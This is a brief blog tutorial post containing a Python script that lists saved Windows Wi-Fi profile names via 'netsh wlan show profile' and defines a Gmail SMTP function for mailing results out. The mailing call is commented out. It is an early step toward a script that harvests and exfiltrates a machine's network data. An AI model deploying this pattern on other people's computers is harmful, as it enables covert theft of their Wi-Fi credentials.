Filtering Command Output using Regex
#!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() command = "netsh wlan show profile" networks = subprocess.check_output(command, shell=True) network_names = re.findall(b"(?:Profile\s*:\s)(.*)", networks) print(network_names) # send_mail("[email protected]", "1111111", result)
原文地址:https://www.cnblogs.com/keepmoving1113/p/11605273.html
时间: 2024-10-09 20:20:27